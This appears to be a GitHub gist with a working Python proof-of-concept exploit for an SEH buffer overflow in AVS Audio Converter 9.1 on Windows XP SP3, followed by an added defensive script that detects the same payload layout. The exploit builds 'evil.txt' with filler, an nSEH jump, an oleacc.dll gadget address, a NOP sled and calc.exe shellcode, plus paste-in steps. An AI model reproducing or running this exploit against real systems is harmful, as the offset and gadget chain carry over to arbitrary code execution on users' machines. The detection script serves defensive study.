@hexabin hexabin/avs_exploit.py
Last active Jan 16, 2020

A working exploit PoC for AVS Audio Converter 9.1 (SEH Buffer Overflow)
#!/usr/bin/python
#----------------------------------------------------------------------------------
# Exploit:  AVS Audio Converter 9.1
# OS:       WinXP SP3
# Author:   Hexabin (@TheRealHexabin - Twitter)
# Software: https://www.avs4you.com/avs-audio-converter.aspx
#
# Original Author: ZwX
# Link to Original Exploit: https://www.exploit-db.com/exploits/47788
#----------------------------------------------------------------------------------
# Badchars: \x00\x0A\x0D
#----------------------------------------------------------------------------------
# 0x74c9ea1e : pop ebx # pop edi # ret 0x10 | {PAGE_EXECUTE_READ} [oleacc.dll]
#              ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.2.5406.0
#              (C:\WINDOWS\system32\oleacc.dll)
#----------------------------------------------------------------------------------
# Proof of Concept (PoC):
# =======================
# 1. Download and install AVS Audio Converter
# 2. Open the AVS Audio Converter
# 3. Run the python script to create the file evil.txt
# 4. Copy and paste the characters found in the file (evil.txt) in the field "Output Folder"
# 5. Click on browse
# 6. pWnEd!
filename = "evil.txt"

# Windows XP SP3 calc.exe shellcode: http://shell-storm.org/shellcode/files/shellcode-739.php
shellcode = (
    b"\x31\xC9"
    b"\x51"
    b"\x68\x63\x61\x6C\x63"
    b"\x54"
    b"\xB8\xC7\x93\xC2\x77"
    b"\xFF\xD0"
)

nseh = b"\xEB\x06\x90\x90"  # short jump (EB 06) over the 4-byte SEH pointer into the NOP sled
seh = b"\x1E\xEA\xC9\x74"   # 0x74c9ea1e little-endian: pop ebx # pop edi # ret 0x10 (oleacc.dll)
nopsled = b"\x90" * 20
junk = (1212 - len(shellcode)) * b"D"

# nSEH sits at offset 260 in the Output Folder string
buffer = b"A" * 260 + nseh + seh + nopsled + shellcode + junk

# Byte literals and binary mode keep the escapes as raw bytes under both Python 2 and 3
with open(filename, "wb") as textFile:
    textFile.write(buffer)
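As an added, defender-side example that is not part of the gist: a triage script for a suspect input (crash file, pasted folder path, fuzzer sample) that locates the nSEH/SEH layout this PoC uses, decodes the overwritten handler pointer and flags the oleacc.dll gadget address the header names. The sample buffer, the inert int3 filler and the 64-byte filler threshold are constructed assumptions.

```python
import re
import struct

# Handler address the PoC header names as living in a module without SafeSEH (value from the page).
KNOWN_GADGETS = {0x74C9EA1E: "oleacc.dll v4.2.5406.0: pop ebx # pop edi # ret 0x10"}

# nSEH = short jump over the handler pointer (EB 06 + 2 pad bytes), then the 4-byte SEH pointer.
SEH_PAIR = re.compile(rb"\xEB\x06..(.{4})", re.DOTALL)

def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte (filler such as 'A' * 260)."""
    best = i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        best = max(best, j - i)
        i = j
    return best

def triage_seh_overwrite(data: bytes, sled_len: int = 8) -> list:
    """Return one finding per nSEH/SEH pair found in a suspect input."""
    findings = []
    for m in SEH_PAIR.finditer(data):
        handler = struct.unpack("<I", m.group(1))[0]   # pointer is stored little-endian
        tail = data[m.end():m.end() + sled_len]
        findings.append({
            "offset": m.start(),                        # bytes before nSEH (260 in the PoC)
            "handler": handler,
            "known_gadget": KNOWN_GADGETS.get(handler),
            "nop_sled_follows": tail == b"\x90" * sled_len,
            "lead_filler": longest_run(data[:m.start()]),
        })
    return findings

def is_suspicious(data: bytes) -> bool:
    """Alert rule: jump/pointer pair after long filler, plus a NOP sled or a known gadget (threshold assumed)."""
    return any(f["lead_filler"] >= 64 and (f["nop_sled_follows"] or f["known_gadget"])
               for f in triage_seh_overwrite(data))

# Constructed sample mirroring the PoC layout; the "shellcode" here is inert int3 filler.
SAMPLE = (b"A" * 260 + b"\xEB\x06\x90\x90" + struct.pack("<I", 0x74C9EA1E)
          + b"\x90" * 20 + b"\xCC" * 8 + b"D" * 100)
BENIGN = b"C:\\Users\\analyst\\Music\\converted"   # an ordinary Output Folder value

if __name__ == "__main__":
    print(triage_seh_overwrite(SAMPLE), is_suspicious(SAMPLE), is_suspicious(BENIGN))
```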